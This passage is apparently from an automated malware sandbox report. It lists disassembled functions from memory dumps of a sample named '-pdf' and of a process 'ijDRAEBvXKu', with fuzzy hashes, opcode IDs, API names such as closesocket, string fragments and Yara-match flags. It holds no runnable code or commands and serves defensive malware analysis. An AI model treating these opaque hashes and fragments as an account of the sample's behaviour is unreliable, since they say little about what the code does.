                                                                                                                                                • Opcode ID: 24c12706d8d0bfa75f4395a0c96d31976332faf6fb66562903dccf9e13c01d02
                                                                                                                                                • Instruction ID: 721a6a9b6a785c4ea25371b32ac2b9e87c69da11d567338f7f5f3c7c64f97c48
                                                                                                                                                • Opcode Fuzzy Hash: 24c12706d8d0bfa75f4395a0c96d31976332faf6fb66562903dccf9e13c01d02
                                                                                                                                                • Instruction Fuzzy Hash: E9324674D04369DFEB29CF64C994BD9BBB0BF08304F0085E9D949A7291DBB49A84CF91
                                                                                                                                                Function 326C8B90 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 298COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: ${l2
                                                                                                                                                • API String ID: 0-1423303449
                                                                                                                                                • Opcode ID: 501d205168db621130c0a1425c78094f7c85755da4403c50b2e0f4747211346b
                                                                                                                                                • Instruction ID: d5ccdb53e8163c6677aefe40a30a3ad96d7b7c0e32fa163218ab01a29fd546dd
                                                                                                                                                • Opcode Fuzzy Hash: 501d205168db621130c0a1425c78094f7c85755da4403c50b2e0f4747211346b
                                                                                                                                                • Instruction Fuzzy Hash: 3AB1ACB16093619FD721DF24D880A5BBBE5FF84794F405A6EF9A4CB290DB30D804CB92
                                                                                                                                                Function 32654B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 0$Flst
                                                                                                                                                • API String ID: 0-758220159
                                                                                                                                                • Opcode ID: 1d0e1a59a54fd226fe75eadab10cb0e1aec21e1c9ac9875d0684bae329551325
                                                                                                                                                • Instruction ID: dd4f10190f1bc9b61ad0186a2febf1110d4b92940c0ca384bdd782cabd1a7668
                                                                                                                                                • Opcode Fuzzy Hash: 1d0e1a59a54fd226fe75eadab10cb0e1aec21e1c9ac9875d0684bae329551325
                                                                                                                                                • Instruction Fuzzy Hash: F451BEB5E01648CFEB15CF96C88479DFBF4EF84798F2480AED4459B240EBB09981CB91
                                                                                                                                                Function 3261E67A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: ^a2
                                                                                                                                                • API String ID: 3446177414-291807427
                                                                                                                                                • Opcode ID: 47ea3fc02953e5fb21513caea1a53843870c474efe35ab7276b1bf3d625cd6d0
                                                                                                                                                • Instruction ID: f027ab1dbb45d20f6d73ff8bd3709aa9c01be0e6bfbb1bd842181f37823a26a5
                                                                                                                                                • Opcode Fuzzy Hash: 47ea3fc02953e5fb21513caea1a53843870c474efe35ab7276b1bf3d625cd6d0
                                                                                                                                                • Instruction Fuzzy Hash: CB419CB9A00201DFDB09CF29C4805597BF6FF99750B64846AEC088B361DB30F881CBE1
                                                                                                                                                Function 3261E880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: a2$ma2
                                                                                                                                                • API String ID: 3446177414-2755310377
                                                                                                                                                • Opcode ID: ce38526d608ceb5c9ffb8dba6886f6ac2e13c56260cb7b175313df580e9a321b
                                                                                                                                                • Instruction ID: 710541b057d1b2e5bb479be3b2517f13511b44988b7dcdfdfefdf3cea42c17d3
                                                                                                                                                • Opcode Fuzzy Hash: ce38526d608ceb5c9ffb8dba6886f6ac2e13c56260cb7b175313df580e9a321b
                                                                                                                                                • Instruction Fuzzy Hash: CB11C3B6A01208AFDF11CF98D885ADEBBB8FF4C360F10401AF911B7240D775AA54CBA4

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:2.2%
                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                Signature Coverage:0%
                                                                                                                                                Total number of Nodes:3
                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                execution_graph 12547 10546ab 12548 10546c5 12547->12548 12549 10546d4 closesocket 12548->12549

                                                                                                                                                Executed Functions

                                                                                                                                                Function 010546AB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 0 10546ab-10546e2 call 102c21b call 10552ab closesocket
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_1020000_ijDRAEBvXKu.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: closesocket
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2781271927-0
                                                                                                                                                • Opcode ID: 23cbed43c04841a1f64366bc08e70969fc8ff187bcf84d30a10d5acbacbcad06
                                                                                                                                                • Instruction ID: b79885d0406518bf09f98b49a9b9d73cd23e8c66560b43ee1f786846e93e9448
                                                                                                                                                • Opcode Fuzzy Hash: 23cbed43c04841a1f64366bc08e70969fc8ff187bcf84d30a10d5acbacbcad06
                                                                                                                                                • Instruction Fuzzy Hash: 0FE08C722002147BD210EAAADC80DEB776CEFCA3A0B004419FA4CA7202C6B1BA0587F0

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 0103490B Relevance: 31.7, Strings: 25, Instructions: 460COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_1020000_ijDRAEBvXKu.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: )j$-z$1$2$2$4$7$8c$D$E$M>$N`$Q*$R$Vs$`$d$k$nz$os$s>$s^$|7$~r$=
                                                                                                                                                • API String ID: 0-680142647
                                                                                                                                                • Opcode ID: 82414673f08bcfd8b7f509060940dd8daa0b5addee3b1fa4194040737e59a542
                                                                                                                                                • Instruction ID: 9ccc744e34c1d640702d38a6a6868358972516df9ef8e1691c6e51b58f594ce4
                                                                                                                                                • Opcode Fuzzy Hash: 82414673f08bcfd8b7f509060940dd8daa0b5addee3b1fa4194040737e59a542
                                                                                                                                                • Instruction Fuzzy Hash: 4742BEB0D05229CFEB64CF48C998BDDBBB6BB85308F1081D9D149AB291C7B55A85CF41
                                                                                                                                                Function 0103FF1E Relevance: .0, Instructions: 11COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_1020000_ijDRAEBvXKu.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: f3e65ee7bbc9e3b455a2f948679397b4df115a0b3218fac33f1ad6191bc5e0a0
                                                                                                                                                • Instruction ID: 450525914025fe76da948c7715483ddcc2f35a5cd752e503218000f2f09478bc
                                                                                                                                                • Opcode Fuzzy Hash: f3e65ee7bbc9e3b455a2f948679397b4df115a0b3218fac33f1ad6191bc5e0a0
                                                                                                                                                • Instruction Fuzzy Hash: D9B01237F000140589244D89B4800B0F330E287033F2032E3DE0CB74091102D41005CC